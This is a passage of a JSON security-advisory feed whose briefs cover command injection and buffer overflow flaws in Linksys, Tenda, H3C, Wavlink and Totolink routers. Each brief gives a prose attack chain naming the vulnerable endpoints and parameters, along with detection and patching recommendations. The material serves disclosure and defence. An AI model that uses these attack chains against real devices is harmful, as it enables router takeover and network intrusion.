CVE-2026-6992, affects the Linksys MR9600 router, specifically version 2.0.6.206937. The vulnerability resides in the JNAP Action Handler component within the \u003ccode\u003e/etc/init.d/run_central2.sh\u003c/code\u003e script. Attackers can remotely exploit this flaw by manipulating the \u003ccode\u003epin\u003c/code\u003e argument passed to the \u003ccode\u003eBTRequestGetSmartConnectStatus\u003c/code\u003e function. This allows for the execution of arbitrary operating system commands on the affected device. A public exploit is available, increasing the risk of exploitation. The vendor was notified but did not respond.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the Linksys MR9600 router.\u003c/li\u003e\n\u003cli\u003eThe request targets the JNAP Action Handler component, specifically the \u003ccode\u003e/etc/init.d/run_central2.sh\u003c/code\u003e script.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eBTRequestGetSmartConnectStatus\u003c/code\u003e function is invoked by the crafted request.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious OS commands within the \u003ccode\u003epin\u003c/code\u003e argument of the \u003ccode\u003eBTRequestGetSmartConnectStatus\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe router\u0026rsquo;s firmware processes the request, failing to properly sanitize the \u003ccode\u003epin\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed with the privileges of the running process, potentially \u003ccode\u003eroot\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the router, potentially allowing for further malicious activities, such as network traffic interception or modification of router settings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6992 allows a remote attacker to execute arbitrary commands on the Linksys MR9600 router. This can lead to a complete compromise of the device, allowing the attacker to monitor network traffic, change router configurations, or use the router as a foothold for further attacks within the network. Given the availability of a public exploit, the risk of widespread exploitation is high.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect CVE-2026-6992 Exploitation Attempt\u003c/code\u003e to identify exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u003ccode\u003eDetect Suspicious Shell Activity via Web Request\u003c/code\u003e to detect potential command injection attempts.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests containing suspicious characters in the \u003ccode\u003ecs-uri-query\u003c/code\u003e field that target \u003ccode\u003e/etc/init.d/run_central2.sh\u003c/code\u003e to uncover exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-26T12:00:00Z","date_published":"2026-04-26T12:00:00Z","id":"/briefs/2026-04-linksys-rce/","summary":"CVE-2026-6992 is a command injection vulnerability in the Linksys MR9600 router that allows remote attackers to execute arbitrary OS commands by manipulating the 'pin' argument in the BTRequestGetSmartConnectStatus function.","title":"Linksys MR9600 Command Injection Vulnerability (CVE-2026-6992)","url":"https://feed.craftedsignal.io/briefs/2026-04-linksys-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7033"}],"_cs_exploited":false,"_cs_products":["F456 1.0.0.5"],"_cs_severities":["critical"],"_cs_tags":["buffer-overflow","remote-code-execution","cve-2026-7033","router"],"_cs_type":"advisory","_cs_vendors":["Tenda"],"content_html":"\u003cp\u003eA buffer overflow vulnerability has been identified in Tenda F456 router, specifically version 1.0.0.5. The vulnerability resides within the \u003ccode\u003efromSafeClientFilter\u003c/code\u003e function located in the \u003ccode\u003e/goform/SafeClientFilter\u003c/code\u003e file. Successful exploitation allows a remote attacker to inject and execute arbitrary code. Publicly available exploit code exists, increasing the risk of widespread exploitation targeting vulnerable Tenda F456 devices. This issue poses a significant threat to network security, as a compromised router can lead to data breaches, denial of service, or further network intrusion.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Tenda F456 router running firmware version 1.0.0.5 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/SafeClientFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a specially designed payload within the \u003ccode\u003emenufacturer/Go\u003c/code\u003e argument. This payload is designed to trigger a buffer overflow in the \u003ccode\u003efromSafeClientFilter\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromSafeClientFilter\u003c/code\u003e function processes the malicious input without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe oversized payload overwrites adjacent memory regions, potentially including return addresses or other critical data.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003efromSafeClientFilter\u003c/code\u003e function attempts to return, the overwritten return address is used, redirecting execution flow to attacker-controlled memory.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled memory contains shellcode or other malicious instructions.\u003c/li\u003e\n\u003cli\u003eThe router executes the attacker\u0026rsquo;s code, granting the attacker control over the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can result in complete compromise of the Tenda F456 router. An attacker can gain unauthorized access to network traffic, modify router settings, or use the compromised device as a launchpad for further attacks within the network. Given the public availability of exploit code, a large number of Tenda F456 routers could be targeted, potentially affecting numerous home and small business networks. A successful attack could lead to data theft, service disruption, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available patches or firmware updates released by Tenda to address CVE-2026-7033 on the F456 1.0.0.5 routers.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) or intrusion prevention systems (IPS) rules to detect and block malicious requests targeting the \u003ccode\u003e/goform/SafeClientFilter\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to your SIEM to detect exploitation attempts targeting the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/SafeClientFilter\u003c/code\u003e with abnormally large \u003ccode\u003emenufacturer/Go\u003c/code\u003e argument values.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-26T11:16:06Z","date_published":"2026-04-26T11:16:06Z","id":"/briefs/2026-04-tenda-buffer-overflow/","summary":"A buffer overflow vulnerability in Tenda F456 router version 1.0.0.5 allows a remote attacker to execute arbitrary code by exploiting the fromSafeClientFilter function in the /goform/SafeClientFilter endpoint through manipulation of the 'menufacturer/Go' argument.","title":"Tenda F456 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","router","buffer_overflow","cve-2026-6631","webserver"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-6631 is a critical buffer overflow vulnerability affecting Tenda F451 routers running firmware version 1.0.0.7_cn_svn7958. The vulnerability resides in the \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function within the \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e component of the router\u0026rsquo;s \u003ccode\u003ehttpd\u003c/code\u003e web server. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted HTTP request with an overly long \u0026lsquo;page\u0026rsquo; parameter. Publicly available exploits exist, increasing the risk of widespread exploitation. Successful exploitation allows attackers to execute arbitrary code on the router, potentially leading to full device compromise and network access.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Tenda F451 router exposed to the internet.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTTP GET or POST request targeting \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003epage\u003c/code\u003e parameter with a payload exceeding the buffer size allocated for it.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e server processes the request and passes the \u003ccode\u003epage\u003c/code\u003e parameter to the vulnerable \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to the lack of proper bounds checking, the overly long \u003ccode\u003epage\u003c/code\u003e parameter overwrites adjacent memory regions on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully designs the overflow payload to overwrite the return address on the stack with the address of malicious code injected elsewhere in memory.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromwebExcptypemanFilter\u003c/code\u003e function completes execution and attempts to return, jumping to the attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s malicious code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e server, potentially gaining full control of the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6631 allows remote attackers to execute arbitrary code on vulnerable Tenda F451 routers. This can lead to complete device compromise, allowing attackers to modify router settings, intercept network traffic, or use the router as a point of entry for further attacks on the internal network. Given the widespread use of Tenda routers, a large number of devices could be vulnerable, potentially impacting both home and small business networks. The availability of public exploits further increases the likelihood of exploitation.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available firmware updates from Tenda to patch CVE-2026-6631.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests to \u003ccode\u003e/goform/webExcptypemanFilter\u003c/code\u003e with unusually long \u003ccode\u003epage\u003c/code\u003e parameters, using the Sigma rule \u003ccode\u003eDetectTendaF451BufferOverflow\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) to detect and block exploit attempts targeting CVE-2026-6631.\u003c/li\u003e\n\u003cli\u003eConsider deploying the Sigma rule \u003ccode\u003eDetectTendaF451SuspiciousProcess\u003c/code\u003e to identify unexpected processes spawned by the httpd daemon.\u003c/li\u003e\n\u003cli\u003eIf patching is not immediately feasible, consider restricting access to the router\u0026rsquo;s web interface from the public internet to mitigate the risk of remote exploitation.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-20T11:16:19Z","date_published":"2026-04-20T11:16:19Z","id":"/briefs/2026-04-tenda-f451-buffer-overflow/","summary":"A buffer overflow vulnerability (CVE-2026-6631) in Tenda F451 router version 1.0.0.7_cn_svn7958 allows remote attackers to execute arbitrary code by manipulating the 'page' argument in the /goform/webExcptypemanFilter component.","title":"Tenda F451 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f451-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6581"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6581","buffer-overflow","router","h3c"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-6581, affects H3C Magic B1 routers up to version 100R004. The vulnerability resides in the \u003ccode\u003eSetMobileAPInfoById\u003c/code\u003e function within the \u003ccode\u003e/goform/aspForm\u003c/code\u003e file. An attacker can exploit this flaw by crafting a malicious request that manipulates the \u003ccode\u003eparam\u003c/code\u003e argument, leading to a buffer overflow and potential remote code execution. This vulnerability is particularly concerning because a public exploit is available, increasing the risk of widespread exploitation. The vendor was notified about the vulnerability but has not responded. Given the ease of exploitation and the potential for complete system compromise, organizations using affected H3C routers should take immediate action.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable H3C Magic B1 router running a firmware version up to 100R004.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/aspForm\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes the \u003ccode\u003eSetMobileAPInfoById\u003c/code\u003e function call with an overly long value for the \u003ccode\u003eparam\u003c/code\u003e argument, triggering the buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites adjacent memory regions, including the return address on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker sets the overwritten return address to point to attacker-controlled code or a ROP chain.\u003c/li\u003e\n\u003cli\u003eWhen the \u003ccode\u003eSetMobileAPInfoById\u003c/code\u003e function returns, execution jumps to the attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s code executes with elevated privileges, potentially allowing full control of the router.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use the compromised router to establish a foothold within the network, exfiltrate data, or launch further attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6581 allows a remote attacker to execute arbitrary code with root privileges on the H3C Magic B1 router. This can lead to complete compromise of the device, allowing the attacker to control network traffic, exfiltrate sensitive data, or use the router as a jumping-off point for further attacks within the network. Given the widespread use of these routers in small to medium-sized businesses and homes, a large number of devices are potentially vulnerable. There is no indication of victim counts or sectors targeted at this time.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect H3C Magic B1 Buffer Overflow Attempt\u003c/code\u003e to your SIEM to detect exploitation attempts targeting CVE-2026-6581 via suspicious HTTP POST requests to \u003ccode\u003e/goform/aspForm\u003c/code\u003e (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eApply appropriate input validation and sanitization measures if you manage the web server to mitigate buffer overflows.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual activity originating from H3C Magic B1 routers.\u003c/li\u003e\n\u003cli\u003eConsider replacing H3C Magic B1 routers with more secure alternatives if updates are not available.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-19T23:16:33Z","date_published":"2026-04-19T23:16:33Z","id":"/briefs/2026-04-h3c-magic-b1-overflow/","summary":"A buffer overflow vulnerability (CVE-2026-6581) in H3C Magic B1 routers allows remote attackers to execute arbitrary code by manipulating the 'param' argument in the SetMobileAPInfoById function.","title":"H3C Magic B1 Router Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-h3c-magic-b1-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6560"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["buffer overflow","cve-2026-6560","h3c","router","network device"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability (CVE-2026-6560) has been identified in H3C Magic B0 routers, specifically in versions up to 100R002. The vulnerability resides within the \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function of the \u003ccode\u003e/goform/aspForm\u003c/code\u003e file. An attacker can remotely exploit this flaw by crafting malicious input to the \u003ccode\u003eparam\u003c/code\u003e argument, leading to arbitrary code execution on the device. Public exploits are reportedly available, increasing the risk of widespread exploitation. The vendor was notified about this vulnerability, but has not provided any response or patch as of April 2026. This poses a significant risk to users of the affected H3C Magic B0 routers.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable H3C Magic B0 router running firmware version 100R002 or earlier.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/aspForm\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes the \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function call.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eparam\u003c/code\u003e argument within the POST data contains a specially crafted string exceeding the buffer size allocated in the \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow occurs when the \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function processes the oversized \u003ccode\u003eparam\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites adjacent memory regions, potentially including the return address on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the program execution flow.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining full control of the device, exfiltrating data, or using it as a pivot point for further attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability (CVE-2026-6560) allows a remote attacker to execute arbitrary code on the affected H3C Magic B0 router. This could lead to a complete compromise of the device, including the ability to modify router settings, intercept network traffic, and potentially gain access to connected devices on the network. Given the availability of public exploits, widespread exploitation is possible, potentially impacting a large number of home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/goform/aspForm\u003c/code\u003e with unusually long \u003ccode\u003eparam\u003c/code\u003e arguments (refer to the Attack Chain section).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting for requests to \u003ccode\u003e/goform/aspForm\u003c/code\u003e to mitigate potential exploitation attempts (refer to the Attack Chain section).\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect exploitation attempts targeting the vulnerable \u003ccode\u003eEdit_BasicSSID\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eBlock network traffic originating from or destined to H3C Magic B0 devices until a patch is available.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-19T07:16:05Z","date_published":"2026-04-19T07:16:05Z","id":"/briefs/2026-04-h3c-magic-buffer-overflow/","summary":"A buffer overflow vulnerability (CVE-2026-6560) in H3C Magic B0 up to 100R002 allows remote attackers to execute arbitrary code by manipulating the 'param' argument in the Edit_BasicSSID function of the /goform/aspForm file.","title":"H3C Magic B0 Router Buffer Overflow Vulnerability (CVE-2026-6560)","url":"https://feed.craftedsignal.io/briefs/2026-04-h3c-magic-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-6483"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","router","cve-2026-6483"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical OS command injection vulnerability, tracked as CVE-2026-6483, has been identified in Wavlink WL-WN530H4 routers running firmware version 20220721. The flaw resides within the \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e file, specifically affecting the \u003ccode\u003estrcat/snprintf\u003c/code\u003e function. Successful exploitation enables remote attackers to execute arbitrary OS commands on the affected device.  The vulnerability is triggered by manipulating input to the vulnerable function. A public exploit is available, increasing the risk of widespread exploitation. Users are advised to upgrade to version 2026.04.16 to mitigate the risk. This vulnerability poses a significant threat due to the potential for complete system compromise, potentially leading to data exfiltration, device hijacking, or denial-of-service attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Wavlink WL-WN530H4 router running firmware version 20220721.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a payload designed to exploit the \u003ccode\u003estrcat/snprintf\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003estrcat/snprintf\u003c/code\u003e function fails to properly sanitize the attacker-controlled input.\u003c/li\u003e\n\u003cli\u003eThe unsanitized input is passed to a system call, resulting in OS command injection.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary OS commands with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker can leverage the compromised system to perform actions such as modifying router configuration, installing malware, or pivoting to other network devices.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access and control over the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary OS commands on the affected Wavlink router. This can lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the router as a launchpad for further attacks within the network. The lack of specifics regarding victimology suggests a wide potential impact affecting numerous users and potentially small businesses relying on these routers.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Wavlink WL-WN530H4 router to firmware version 2026.04.16 to patch CVE-2026-6483.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Wavlink Command Injection Attempt\u0026rdquo; to monitor for malicious requests targeting \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity and unauthorized access attempts following exploitation of CVE-2026-6483.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T11:16:11Z","date_published":"2026-04-17T11:16:11Z","id":"/briefs/2026-04-wavlink-command-injection/","summary":"A remote command injection vulnerability exists in the Wavlink WL-WN530H4 router, specifically in the `strcat/snprintf` function of the `/cgi-bin/internet.cgi` file, allowing attackers to execute arbitrary OS commands.","title":"Wavlink WL-WN530H4 OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-wavlink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6194"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6194","buffer-overflow","totolink","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-6194 describes a stack-based buffer overflow vulnerability present in Totolink A3002MU router firmware version B20211125.1046. The vulnerability resides within the HTTP Request Handler, specifically in the \u003ccode\u003esub_410188\u003c/code\u003e function of the \u003ccode\u003e/boafrm/formWlanSetup\u003c/code\u003e file. A remote attacker can exploit this vulnerability by crafting a malicious HTTP request that manipulates the \u003ccode\u003ewan-url\u003c/code\u003e argument, leading to arbitrary code execution on the device. Publicly available exploit code increases the likelihood of exploitation. Successful exploitation allows an attacker to compromise the device and potentially gain control of the network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink A3002MU router running firmware B20211125.1046.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/boafrm/formWlanSetup\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003ewan-url\u003c/code\u003e argument with a payload exceeding the buffer size allocated for it in the \u003ccode\u003esub_410188\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe HTTP Request Handler processes the request and calls the vulnerable \u003ccode\u003esub_410188\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to insufficient bounds checking, the oversized \u003ccode\u003ewan-url\u003c/code\u003e argument overflows the stack buffer.\u003c/li\u003e\n\u003cli\u003eThe attacker overwrites critical data on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eUpon returning from the \u003ccode\u003esub_410188\u003c/code\u003e function, execution is redirected to an attacker-controlled address.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code, potentially gaining full control of the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6194 can lead to complete compromise of the affected Totolink A3002MU router. This allows attackers to eavesdrop on network traffic, modify DNS settings, inject malicious code into web pages served to connected clients, or use the compromised router as a botnet node. Given the widespread use of these routers, a large number of devices could be at risk, potentially impacting home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/boafrm/formWlanSetup\u003c/code\u003e with unusually long \u003ccode\u003ewan-url\u003c/code\u003e parameters to detect potential exploitation attempts (see Sigma rule \u0026ldquo;Detect Suspicious WAN-URL Parameter Length\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect and alert on potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eIf possible, block requests matching the patterns identified in the Sigma rules at your network perimeter.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T12:00:00Z","date_published":"2026-04-14T12:00:00Z","id":"/briefs/2026-04-totolink-a3002mu-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-6194) exists in the Totolink A3002MU B20211125.1046 router firmware, specifically affecting the `/boafrm/formWlanSetup` component's HTTP request handler, which allows remote attackers to execute arbitrary code by manipulating the `wan-url` argument.","title":"Totolink A3002MU Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-a3002mu-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6168"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["totolink","buffer-overflow","cve-2026-6168","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, tracked as CVE-2026-6168, has been identified in TOTOLINK A7000R routers with firmware versions up to 9.1.0u.6115. The vulnerability resides within the \u003ccode\u003esetWiFiEasyGuestCfg\u003c/code\u003e function located in the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. Successful exploitation allows a remote attacker to execute arbitrary code on the device. Publicly available exploit code exists, increasing the risk of widespread exploitation. Given the widespread use of TOTOLINK devices, this vulnerability poses a significant threat to home and small business networks. Exploitation is possible with low privileges, as it only requires authentication to the device\u0026rsquo;s web interface.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the TOTOLINK A7000R web interface. This step assumes default credentials or compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes the \u003ccode\u003esetWiFiEasyGuestCfg\u003c/code\u003e function call.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003essid5g\u003c/code\u003e argument within the POST request is populated with a string exceeding the buffer\u0026rsquo;s capacity.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003esetWiFiEasyGuestCfg\u003c/code\u003e function in \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e processes the oversized \u003ccode\u003essid5g\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThis leads to a stack-based buffer overflow, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the overflow to inject and execute arbitrary code on the device.\u003c/li\u003e\n\u003cli\u003eSuccessful code execution can grant the attacker full control of the router, enabling further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6168 allows a remote attacker to execute arbitrary code on the vulnerable TOTOLINK A7000R device. This can lead to complete compromise of the router, including the ability to intercept network traffic, modify DNS settings, inject malicious scripts into websites, and use the router as a pivot point for further attacks within the network. This vulnerability affects potentially thousands of devices, particularly in home and small business environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply firmware updates immediately if TOTOLINK releases a patch for CVE-2026-6168.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with unusually long \u003ccode\u003essid5g\u003c/code\u003e parameters, using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) rules to detect attempts to exploit stack-based buffer overflows targeting TOTOLINK devices.\u003c/li\u003e\n\u003cli\u003eRestrict access to the router\u0026rsquo;s web interface to trusted IP addresses, if possible.\u003c/li\u003e\n\u003cli\u003eEnforce strong and unique passwords for all router accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-13T07:16:51Z","date_published":"2026-04-13T07:16:51Z","id":"/briefs/2026-04-totolink-buffer-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-6168) exists in TOTOLINK A7000R devices up to version 9.1.0u.6115, allowing remote attackers to execute arbitrary code via a crafted ssid5g argument to the setWiFiEasyGuestCfg function in /cgi-bin/cstecgi.cgi.","title":"TOTOLINK A7000R Stack-Based Buffer Overflow 